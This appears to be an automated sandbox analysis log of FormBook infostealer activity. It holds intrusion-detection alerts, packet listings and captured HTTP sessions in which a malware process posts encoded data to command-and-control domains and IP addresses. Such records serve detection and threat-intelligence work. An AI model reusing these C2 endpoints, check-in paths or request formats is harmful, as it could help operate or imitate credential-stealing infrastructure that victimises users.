                                                                                                                    2024-09-30T19:59:10.895681+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549746206.119.82.14780TCP
                                                                                                                    2024-09-30T19:59:13.747761+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549747206.119.82.14780TCP
                                                                                                                    2024-09-30T19:59:16.060399+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549748206.119.82.14780TCP
                                                                                                                    2024-09-30T19:59:23.008354+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54974946.17.172.4980TCP
                                                                                                                    2024-09-30T19:59:25.283608+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54975046.17.172.4980TCP
                                                                                                                    2024-09-30T19:59:27.968098+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54975146.17.172.4980TCP
                                                                                                                    2024-09-30T19:59:30.352231+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.54975246.17.172.4980TCP
                                                                                                                    2024-09-30T19:59:36.955960+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5497533.33.130.19080TCP
                                                                                                                    2024-09-30T19:59:38.529681+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5497543.33.130.19080TCP
                                                                                                                    2024-09-30T19:59:42.136872+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5497553.33.130.19080TCP
                                                                                                                    2024-09-30T19:59:43.857945+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.5497563.33.130.19080TCP
                                                                                                                    2024-09-30T19:59:49.473446+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549757144.34.186.8580TCP
                                                                                                                    2024-09-30T19:59:52.046037+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549758144.34.186.8580TCP
                                                                                                                    2024-09-30T19:59:54.594100+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549759144.34.186.8580TCP
                                                                                                                    2024-09-30T19:59:57.106812+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549760144.34.186.8580TCP
                                                                                                                    2024-09-30T20:00:03.141019+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549761136.143.186.1280TCP
                                                                                                                    2024-09-30T20:00:05.664801+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549762136.143.186.1280TCP
                                                                                                                    2024-09-30T20:00:08.221746+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549763136.143.186.1280TCP
Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                                                                                                    Sep 30, 2024 19:58:01.229717970 CEST8049725203.175.9.128192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:01.229803085 CEST8049725203.175.9.128192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:01.229929924 CEST8049725203.175.9.128192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:01.230073929 CEST4972580192.168.2.5203.175.9.128
                                                                                                                    Sep 30, 2024 19:58:01.281960011 CEST4972580192.168.2.5203.175.9.128
                                                                                                                    Sep 30, 2024 19:58:02.297398090 CEST4972680192.168.2.5203.175.9.128
                                                                                                                    Sep 30, 2024 19:58:02.302809000 CEST8049726203.175.9.128192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:02.302903891 CEST4972680192.168.2.5203.175.9.128
                                                                                                                    Sep 30, 2024 19:58:02.317236900 CEST4972680192.168.2.5203.175.9.128
                                                                                                                    Sep 30, 2024 19:58:02.322069883 CEST8049726203.175.9.128192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:03.824657917 CEST4972680192.168.2.5203.175.9.128
                                                                                                                    Sep 30, 2024 19:58:03.834688902 CEST8049726203.175.9.128192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:03.837955952 CEST4972680192.168.2.5203.175.9.128
                                                                                                                    Sep 30, 2024 19:58:04.843549967 CEST4972780192.168.2.5203.175.9.128
                                                                                                                    Sep 30, 2024 19:58:04.848519087 CEST8049727203.175.9.128192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:04.848647118 CEST4972780192.168.2.5203.175.9.128
                                                                                                                    Sep 30, 2024 19:58:04.862169981 CEST4972780192.168.2.5203.175.9.128
                                                                                                                    Sep 30, 2024 19:58:04.867079020 CEST8049727203.175.9.128192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:04.867185116 CEST8049727203.175.9.128192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:06.299690008 CEST8049727203.175.9.128192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:06.299815893 CEST8049727203.175.9.128192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:06.299871922 CEST4972780192.168.2.5203.175.9.128
                                                                                                                    Sep 30, 2024 19:58:06.299928904 CEST8049727203.175.9.128192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:06.299942017 CEST8049727203.175.9.128192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:06.299953938 CEST8049727203.175.9.128192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:06.299979925 CEST8049727203.175.9.128192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:06.299987078 CEST4972780192.168.2.5203.175.9.128
                                                                                                                    Sep 30, 2024 19:58:06.299994946 CEST8049727203.175.9.128192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:06.300008059 CEST8049727203.175.9.128192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:06.300019026 CEST8049727203.175.9.128192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:06.300019979 CEST4972780192.168.2.5203.175.9.128
                                                                                                                    Sep 30, 2024 19:58:06.300045013 CEST4972780192.168.2.5203.175.9.128
                                                                                                                    Sep 30, 2024 19:58:06.300447941 CEST8049727203.175.9.128192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:06.300497055 CEST4972780192.168.2.5203.175.9.128
                                                                                                                    Sep 30, 2024 19:58:06.371339083 CEST4972780192.168.2.5203.175.9.128
                                                                                                                    Sep 30, 2024 19:58:07.393820047 CEST4972880192.168.2.5203.175.9.128
                                                                                                                    Sep 30, 2024 19:58:07.401112080 CEST8049728203.175.9.128192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:07.401197910 CEST4972880192.168.2.5203.175.9.128
                                                                                                                    Sep 30, 2024 19:58:07.408763885 CEST4972880192.168.2.5203.175.9.128
                                                                                                                    Sep 30, 2024 19:58:07.414817095 CEST8049728203.175.9.128192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:08.829647064 CEST8049728203.175.9.128192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:08.839890003 CEST8049728203.175.9.128192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:08.839936018 CEST8049728203.175.9.128192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:08.840099096 CEST4972880192.168.2.5203.175.9.128
                                                                                                                    Sep 30, 2024 19:58:08.840157032 CEST4972880192.168.2.5203.175.9.128
                                                                                                                    Sep 30, 2024 19:58:08.842962980 CEST4972880192.168.2.5203.175.9.128
                                                                                                                    Sep 30, 2024 19:58:08.847805023 CEST8049728203.175.9.128192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:14.002918959 CEST4972980192.168.2.5162.0.238.246
                                                                                                                    Sep 30, 2024 19:58:14.009043932 CEST8049729162.0.238.246192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:14.009119987 CEST4972980192.168.2.5162.0.238.246
                                                                                                                    Sep 30, 2024 19:58:14.022892952 CEST4972980192.168.2.5162.0.238.246
                                                                                                                    Sep 30, 2024 19:58:14.027751923 CEST8049729162.0.238.246192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:14.598086119 CEST8049729162.0.238.246192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:14.598191977 CEST8049729162.0.238.246192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:14.598244905 CEST4972980192.168.2.5162.0.238.246
                                                                                                                    Sep 30, 2024 19:58:15.528222084 CEST4972980192.168.2.5162.0.238.246
                                                                                                                    Sep 30, 2024 19:58:16.546130896 CEST4973080192.168.2.5162.0.238.246
                                                                                                                    Sep 30, 2024 19:58:16.551197052 CEST8049730162.0.238.246192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:16.551328897 CEST4973080192.168.2.5162.0.238.246
                                                                                                                    Sep 30, 2024 19:58:16.562277079 CEST4973080192.168.2.5162.0.238.246
                                                                                                                    Sep 30, 2024 19:58:16.567529917 CEST8049730162.0.238.246192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:17.150734901 CEST8049730162.0.238.246192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:17.151021957 CEST8049730162.0.238.246192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:17.157457113 CEST4973080192.168.2.5162.0.238.246
                                                                                                                    Sep 30, 2024 19:58:18.074517965 CEST4973080192.168.2.5162.0.238.246
                                                                                                                    Sep 30, 2024 19:58:19.097853899 CEST4973180192.168.2.5162.0.238.246
                                                                                                                    Sep 30, 2024 19:58:19.102758884 CEST8049731162.0.238.246192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:19.106060028 CEST4973180192.168.2.5162.0.238.246
                                                                                                                    Sep 30, 2024 19:58:19.117880106 CEST4973180192.168.2.5162.0.238.246
                                                                                                                    Sep 30, 2024 19:58:19.122793913 CEST8049731162.0.238.246192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:19.123277903 CEST8049731162.0.238.246192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:19.706927061 CEST8049731162.0.238.246192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:19.707175016 CEST8049731162.0.238.246192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:19.707879066 CEST4973180192.168.2.5162.0.238.246
                                                                                                                    Sep 30, 2024 19:58:20.621434927 CEST4973180192.168.2.5162.0.238.246
                                                                                                                    Sep 30, 2024 19:58:21.645320892 CEST4973280192.168.2.5162.0.238.246
                                                                                                                    Sep 30, 2024 19:58:21.650954962 CEST8049732162.0.238.246192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:21.651243925 CEST4973280192.168.2.5162.0.238.246
                                                                                                                    Sep 30, 2024 19:58:21.659895897 CEST4973280192.168.2.5162.0.238.246
                                                                                                                    Sep 30, 2024 19:58:21.664731026 CEST8049732162.0.238.246192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:22.256741047 CEST8049732162.0.238.246192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:22.257128954 CEST8049732162.0.238.246192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:22.257209063 CEST4973280192.168.2.5162.0.238.246
                                                                                                                    Sep 30, 2024 19:58:22.268590927 CEST4973280192.168.2.5162.0.238.246
                                                                                                                    Sep 30, 2024 19:58:22.274462938 CEST8049732162.0.238.246192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:27.376235962 CEST4973380192.168.2.531.31.196.17
                                                                                                                    Sep 30, 2024 19:58:27.381182909 CEST804973331.31.196.17192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:27.385921001 CEST4973380192.168.2.531.31.196.17
                                                                                                                    Sep 30, 2024 19:58:27.396368027 CEST4973380192.168.2.531.31.196.17
                                                                                                                    Sep 30, 2024 19:58:27.401333094 CEST804973331.31.196.17192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:28.107503891 CEST804973331.31.196.17192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:28.107563972 CEST804973331.31.196.17192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:28.107636929 CEST4973380192.168.2.531.31.196.17
                                                                                                                    Sep 30, 2024 19:58:28.904475927 CEST4973380192.168.2.531.31.196.17
                                                                                                                    Sep 30, 2024 19:58:29.921783924 CEST4973480192.168.2.531.31.196.17
                                                                                                                    Sep 30, 2024 19:58:29.926940918 CEST804973431.31.196.17192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:29.928200006 CEST4973480192.168.2.531.31.196.17
                                                                                                                    Sep 30, 2024 19:58:29.939858913 CEST4973480192.168.2.531.31.196.17
                                                                                                                    Sep 30, 2024 19:58:29.944895029 CEST804973431.31.196.17192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:30.695768118 CEST804973431.31.196.17192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:30.695872068 CEST804973431.31.196.17192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:30.695960999 CEST4973480192.168.2.531.31.196.17
                                                                                                                    Sep 30, 2024 19:58:31.451977968 CEST4973480192.168.2.531.31.196.17
                                                                                                                    Sep 30, 2024 19:58:32.468677998 CEST4973580192.168.2.531.31.196.17
                                                                                                                    Sep 30, 2024 19:58:32.475780964 CEST804973531.31.196.17192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:32.475910902 CEST4973580192.168.2.531.31.196.17
                                                                                                                    Sep 30, 2024 19:58:32.486839056 CEST4973580192.168.2.531.31.196.17
                                                                                                                    Sep 30, 2024 19:58:32.493303061 CEST804973531.31.196.17192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:32.493911982 CEST804973531.31.196.17192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:33.170191050 CEST804973531.31.196.17192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:33.214999914 CEST4973580192.168.2.531.31.196.17
                                                                                                                    Sep 30, 2024 19:58:33.291565895 CEST804973531.31.196.17192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:33.291754961 CEST4973580192.168.2.531.31.196.17
                                                                                                                    Sep 30, 2024 19:58:33.996295929 CEST4973580192.168.2.531.31.196.17
                                                                                                                    Sep 30, 2024 19:58:35.017852068 CEST4973680192.168.2.531.31.196.17
                                                                                                                    Sep 30, 2024 19:58:35.022727966 CEST804973631.31.196.17192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:35.029848099 CEST4973680192.168.2.531.31.196.17
                                                                                                                    Sep 30, 2024 19:58:35.033844948 CEST4973680192.168.2.531.31.196.17
                                                                                                                    Sep 30, 2024 19:58:35.038599968 CEST804973631.31.196.17192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:35.786484003 CEST804973631.31.196.17192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:35.786647081 CEST804973631.31.196.17192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:35.790023088 CEST4973680192.168.2.531.31.196.17
                                                                                                                    Sep 30, 2024 19:58:35.793845892 CEST4973680192.168.2.531.31.196.17
                                                                                                                    Sep 30, 2024 19:58:35.799518108 CEST804973631.31.196.17192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:41.149889946 CEST4973780192.168.2.552.223.13.41
                                                                                                                    Sep 30, 2024 19:58:41.156495094 CEST804973752.223.13.41192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:41.160193920 CEST4973780192.168.2.552.223.13.41
                                                                                                                    Sep 30, 2024 19:58:41.173870087 CEST4973780192.168.2.552.223.13.41
                                                                                                                    Sep 30, 2024 19:58:41.178745031 CEST804973752.223.13.41192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:41.822293997 CEST804973752.223.13.41192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:41.825941086 CEST4973780192.168.2.552.223.13.41
                                                                                                                    Sep 30, 2024 19:58:42.683840036 CEST4973780192.168.2.552.223.13.41
                                                                                                                    Sep 30, 2024 19:58:42.689740896 CEST804973752.223.13.41192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:43.705867052 CEST4973880192.168.2.552.223.13.41
                                                                                                                    Sep 30, 2024 19:58:43.711750984 CEST804973852.223.13.41192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:43.711994886 CEST4973880192.168.2.552.223.13.41
                                                                                                                    Sep 30, 2024 19:58:43.725866079 CEST4973880192.168.2.552.223.13.41
                                                                                                                    Sep 30, 2024 19:58:43.731430054 CEST804973852.223.13.41192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:44.220779896 CEST804973852.223.13.41192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:44.220846891 CEST4973880192.168.2.552.223.13.41
                                                                                                                    Sep 30, 2024 19:58:45.230809927 CEST4973880192.168.2.552.223.13.41
                                                                                                                    Sep 30, 2024 19:58:45.239793062 CEST804973852.223.13.41192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:46.250642061 CEST4973980192.168.2.552.223.13.41
                                                                                                                    Sep 30, 2024 19:58:46.255619049 CEST804973952.223.13.41192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:46.255690098 CEST4973980192.168.2.552.223.13.41
                                                                                                                    Sep 30, 2024 19:58:46.270384073 CEST4973980192.168.2.552.223.13.41
                                                                                                                    Sep 30, 2024 19:58:46.275269985 CEST804973952.223.13.41192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:46.275625944 CEST804973952.223.13.41192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:46.816582918 CEST804973952.223.13.41192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:46.816694975 CEST4973980192.168.2.552.223.13.41
                                                                                                                    Sep 30, 2024 19:58:47.777539968 CEST4973980192.168.2.552.223.13.41
                                                                                                                    Sep 30, 2024 19:58:47.782390118 CEST804973952.223.13.41192.168.2.5
                                                                                                                    Sep 30, 2024 19:58:48.797676086 CEST4974080192.168.2.552.223.13.41
                                                                                                                    Sep 30, 2024 19:59:55.511925936 CEST4975980192.168.2.5144.34.186.85
                                                                                                                    Sep 30, 2024 19:59:56.532088041 CEST4976080192.168.2.5144.34.186.85
                                                                                                                    Sep 30, 2024 19:59:56.537081957 CEST8049760144.34.186.85192.168.2.5
                                                                                                                    Sep 30, 2024 19:59:56.537173033 CEST4976080192.168.2.5144.34.186.85
                                                                                                                    Sep 30, 2024 19:59:56.545656919 CEST4976080192.168.2.5144.34.186.85
                                                                                                                    Sep 30, 2024 19:59:56.550508022 CEST8049760144.34.186.85192.168.2.5
                                                                                                                    Sep 30, 2024 19:59:57.106379032 CEST8049760144.34.186.85192.168.2.5
                                                                                                                    Sep 30, 2024 19:59:57.106755972 CEST8049760144.34.186.85192.168.2.5
                                                                                                                    Sep 30, 2024 19:59:57.106812000 CEST4976080192.168.2.5144.34.186.85
                                                                                                                    Sep 30, 2024 19:59:57.110150099 CEST4976080192.168.2.5144.34.186.85
                                                                                                                    Sep 30, 2024 19:59:57.115154982 CEST8049760144.34.186.85192.168.2.5
                                                                                                                    Sep 30, 2024 20:00:02.500834942 CEST4976180192.168.2.5136.143.186.12
                                                                                                                    Sep 30, 2024 20:00:02.506732941 CEST8049761136.143.186.12192.168.2.5
                                                                                                                    Sep 30, 2024 20:00:02.506814957 CEST4976180192.168.2.5136.143.186.12
                                                                                                                    Sep 30, 2024 20:00:02.520931959 CEST4976180192.168.2.5136.143.186.12
                                                                                                                    Sep 30, 2024 20:00:02.526813984 CEST8049761136.143.186.12192.168.2.5
                                                                                                                    Sep 30, 2024 20:00:03.140939951 CEST8049761136.143.186.12192.168.2.5
                                                                                                                    Sep 30, 2024 20:00:03.140964031 CEST8049761136.143.186.12192.168.2.5
                                                                                                                    Sep 30, 2024 20:00:03.140974998 CEST8049761136.143.186.12192.168.2.5
                                                                                                                    Sep 30, 2024 20:00:03.141019106 CEST4976180192.168.2.5136.143.186.12
                                                                                                                    Sep 30, 2024 20:00:03.141064882 CEST4976180192.168.2.5136.143.186.12
                                                                                                                    Sep 30, 2024 20:00:04.027584076 CEST4976180192.168.2.5136.143.186.12
                                                                                                                    Sep 30, 2024 20:00:05.048194885 CEST4976280192.168.2.5136.143.186.12
                                                                                                                    Sep 30, 2024 20:00:05.054598093 CEST8049762136.143.186.12192.168.2.5
                                                                                                                    Sep 30, 2024 20:00:05.054732084 CEST4976280192.168.2.5136.143.186.12
                                                                                                                    Sep 30, 2024 20:00:05.067574978 CEST4976280192.168.2.5136.143.186.12
                                                                                                                    Sep 30, 2024 20:00:05.072644949 CEST8049762136.143.186.12192.168.2.5
                                                                                                                    Sep 30, 2024 20:00:05.664117098 CEST8049762136.143.186.12192.168.2.5
                                                                                                                    Sep 30, 2024 20:00:05.664731026 CEST8049762136.143.186.12192.168.2.5
                                                                                                                    Sep 30, 2024 20:00:05.664745092 CEST8049762136.143.186.12192.168.2.5
                                                                                                                    Sep 30, 2024 20:00:05.664800882 CEST4976280192.168.2.5136.143.186.12
                                                                                                                    Sep 30, 2024 20:00:05.664800882 CEST4976280192.168.2.5136.143.186.12
                                                                                                                    Sep 30, 2024 20:00:06.574393988 CEST4976280192.168.2.5136.143.186.12
                                                                                                                    Sep 30, 2024 20:00:07.594048977 CEST4976380192.168.2.5136.143.186.12
                                                                                                                    Sep 30, 2024 20:00:07.600495100 CEST8049763136.143.186.12192.168.2.5
                                                                                                                    Sep 30, 2024 20:00:07.602080107 CEST4976380192.168.2.5136.143.186.12
                                                                                                                    Sep 30, 2024 20:00:07.612725973 CEST4976380192.168.2.5136.143.186.12
                                                                                                                    Sep 30, 2024 20:00:07.618513107 CEST8049763136.143.186.12192.168.2.5
                                                                                                                    Sep 30, 2024 20:00:07.618529081 CEST8049763136.143.186.12192.168.2.5
                                                                                                                    Sep 30, 2024 20:00:08.221538067 CEST8049763136.143.186.12192.168.2.5
                                                                                                                    Sep 30, 2024 20:00:08.221580982 CEST8049763136.143.186.12192.168.2.5
                                                                                                                    Sep 30, 2024 20:00:08.221745968 CEST4976380192.168.2.5136.143.186.12
                                                                                                                    Sep 30, 2024 20:00:09.465003014 CEST4976380192.168.2.5136.143.186.12
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49712 | 54.67.87.110 | 80 | 4508 | C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
Timestamp | Bytes transferred | Direction | Data
Sep 30, 2024 19:56:59.084404945 CEST | 469 | OUT | GET /fu87/?2Zv0=qtmpl4wh&FbuX5DnP=qh6vHM1wnebxXDDw2+FKNmF+EgGb6h3lhyJTJqyJk9tXxJTOz685U0RnFTuJgXE78BkDdexAIHcYDkJjTquRDOTOtPaRUKFiNfEDt1vQqQEhgT+IhmyUGPK3HCAi1oMdiQ== HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Host: www.ngmr.xyz
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
Sep 30, 2024 19:56:59.678790092 CEST | 550 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                    Content-Length: 282
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    Date: Mon, 30 Sep 2024 18:19:39 GMT
                                                                                                                    X-Varnish: 1107661128
                                                                                                                    Age: 0
                                                                                                                    Via: 1.1 varnish
                                                                                                                    Connection: close
                                                                                                                    X-Varnish-Cache: MISS
                                                                                                                    Server: C2M Server v1.02
                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fu87/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    1 | 192.168.2.5 | 49713 | 195.161.68.8 | 80 | 4508 | C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    Sep 30, 2024 19:57:14.864094019 CEST | 746 | OUT | POST /czka/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Length: 209
                                                                                                                    Host: www.drivedoge.website
                                                                                                                    Origin: http://www.drivedoge.website
                                                                                                                    Referer: http://www.drivedoge.website/czka/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Data Ascii: FbuX5DnP=TeWf6fpTkEffiJg57X5mueQCoXEnXax7o3pibdRn3AdhR+XbAdAjy7uKo9+oqk73/8cvB4xLlfe+hoNErmrSp5faDd4/EMZIfjRiFNRgxDuxsD3sHP6h4uDCUAKmh7nTX/XhigoORgRYfyeIUTTbcm/K2NBA/KlDRgxf6dmt470hB8OBxzf6mr+555LmaNCpKPrxwLs=
                                                                                                                    Sep 30, 2024 19:57:15.566796064 CEST | 778 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Date: Mon, 30 Sep 2024 17:57:15 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 634
                                                                                                                    Connection: close
                                                                                                                    Server: Apache
                                                                                                                    Data Ascii: <!DOCTYPE html><html data-page="404"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title>Ошибка 404. Файл не найден</title></head><body><noscript><h1>Ошибка 404. Файл не найден</h1><p>, , , , .</p><p><a href="https://jino.ru"></a></p></noscript><div id="root"></div><script src="//parking-static.jino.ru/static/main.js?1.25.2" charset="utf-8"></script></body></html>


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    2 | 192.168.2.5 | 49714 | 195.161.68.8 | 80 | 4508 | C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    Sep 30, 2024 19:57:17.477968931 CEST | 766 | OUT | POST /czka/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Length: 229
                                                                                                                    Host: www.drivedoge.website
                                                                                                                    Origin: http://www.drivedoge.website
                                                                                                                    Referer: http://www.drivedoge.website/czka/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Data Ascii: FbuX5DnP=TeWf6fpTkEffkpQ590RmneQFtXEnc6wyo3libZp30z1hUrrbDcAj37uKwt/ikE74/8YWB5NLlfK+hsFErXrVmJfYJN55AMZIfjRiFM1axDWxs3zsGu6i7uDBEwKm37nfX/XPih1pRjpYfwWIUiTaTm/I6dAkv74VfW90ne+vtNEcNqjrrRXS1LSBpqDRL9jAQs7Buc64sdSZR40qgCv5rRj/urgW
                                                                                                                    Sep 30, 2024 19:57:18.204229116 CEST | 778 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Date: Mon, 30 Sep 2024 17:57:18 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 634
                                                                                                                    Connection: close
                                                                                                                    Server: Apache
                                                                                                                    Data Ascii: <!DOCTYPE html><html data-page="404"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title>Ошибка 404. Файл не найден</title></head><body><noscript><h1>Ошибка 404. Файл не найден</h1><p>, , , , .</p><p><a href="https://jino.ru"></a></p></noscript><div id="root"></div><script src="//parking-static.jino.ru/static/main.js?1.25.2" charset="utf-8"></script></body></html>


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    3 | 192.168.2.5 | 49715 | 195.161.68.8 | 80 | 4508 | C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    Sep 30, 2024 19:57:20.015578032 CEST | 1783 | OUT | POST /czka/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Length: 1245
                                                                                                                    Host: www.drivedoge.website
                                                                                                                    Origin: http://www.drivedoge.website
                                                                                                                    Referer: http://www.drivedoge.website/czka/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Sep 30, 2024 19:57:20.890121937 CEST | 778 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Date: Mon, 30 Sep 2024 17:57:20 GMT
                                                                                                                    Content-Type: text/html
